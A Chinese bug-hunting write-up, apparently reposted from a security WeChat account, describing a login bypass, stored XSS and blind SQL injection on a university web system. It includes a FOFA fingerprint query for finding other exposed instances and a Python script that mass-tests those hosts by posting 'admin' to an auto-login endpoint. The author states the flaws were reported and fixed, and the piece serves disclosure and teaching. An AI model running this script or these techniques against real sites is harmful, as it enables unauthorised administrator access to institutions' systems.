一、漏洞挖掘
1、邏輯缺陷
熟悉的頁(yè)面,熟悉的弱口令測(cè)試,但無(wú)果
我就把目光轉(zhuǎn)向js審計(jì),果不其然有新發(fā)現(xiàn),可以根據(jù)賬號(hào)自動(dòng)登錄
于是直接構(gòu)造請(qǐng)求繞過(guò)登錄
經(jīng)典的管理員權(quán)限
2、存儲(chǔ)型XSS
尋找文本輸入
淺析:前端:這里的標(biāo)簽都是普通標(biāo)簽,沒(méi)有像RCDATA元素(RCDATA elements),有
所以就簡(jiǎn)單了,直接插入即可
3、SQL注入
測(cè)試無(wú)果
最后發(fā)現(xiàn)注入點(diǎn)在第一個(gè)函數(shù),果然任何一個(gè)輸入點(diǎn)都可能是不安全的,是布爾型盲注
后面就是經(jīng)典Sqlmap了
二、繼續(xù)通殺
根據(jù)系統(tǒng)指紋在fofa上搜索:"xx系統(tǒng)" && icon_hash="11xxxx"有32個(gè)IP,看了下,有重復(fù)的
使用fofa_viewer導(dǎo)出目標(biāo) 這里我根據(jù)第一個(gè)邏輯漏洞的漏洞指紋信息,寫(xiě)了一個(gè)簡(jiǎn)單poc
import requests def poc(url): poc_url = url + '/login/doautologin.edu' data = {'um.userid': "admin"} try: res = requests.post(poc_url, data=data, timeout=5) if (res.headers.get("Set-Cookie")): # 登錄成功就會(huì)set-cookie print(url + '/login.html') except BaseException: pass if __name__ == '__main__': with open('url.txt', 'r') as f: for i in f: poc(i.rstrip(' '))
以上漏洞均已報(bào)告給相應(yīng)學(xué)校且已修復(fù)
三、思考總結(jié)
1)在訪問(wèn)系統(tǒng)當(dāng)中的時(shí)候F12查看源碼是一個(gè)不錯(cuò)的習(xí)慣(尤其是有前端彈框的)
2)前端代碼的一切展示行為完全可控(一定要理解這句話)
3)了解程序的底層邏輯,你才能更清晰的知道每一個(gè)參數(shù)的意義
本文作者:B0ther
審核編輯:黃飛
-
SQL
+關(guān)注
關(guān)注
1文章
780瀏覽量
44818 -
安全漏洞
+關(guān)注
關(guān)注
0文章
152瀏覽量
16869 -
edu
+關(guān)注
關(guān)注
0文章
15瀏覽量
1855
原文標(biāo)題:記一次EDU網(wǎng)站漏洞通殺
文章出處:【微信號(hào):菜鳥(niǎo)學(xué)安全,微信公眾號(hào):菜鳥(niǎo)學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
有人分享制作藍(lán)牙耳機(jī)的全過(guò)程嗎?
菜鳥(niǎo)制作51避障小車全過(guò)程記錄
CPU制造全過(guò)程
DIY安裝導(dǎo)航+可視倒車+行車記錄+GPS跟蹤全過(guò)程
用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)的全過(guò)程的講解
芯片制造全過(guò)程
用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)全過(guò)程

用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)的全過(guò)程講解

評(píng)論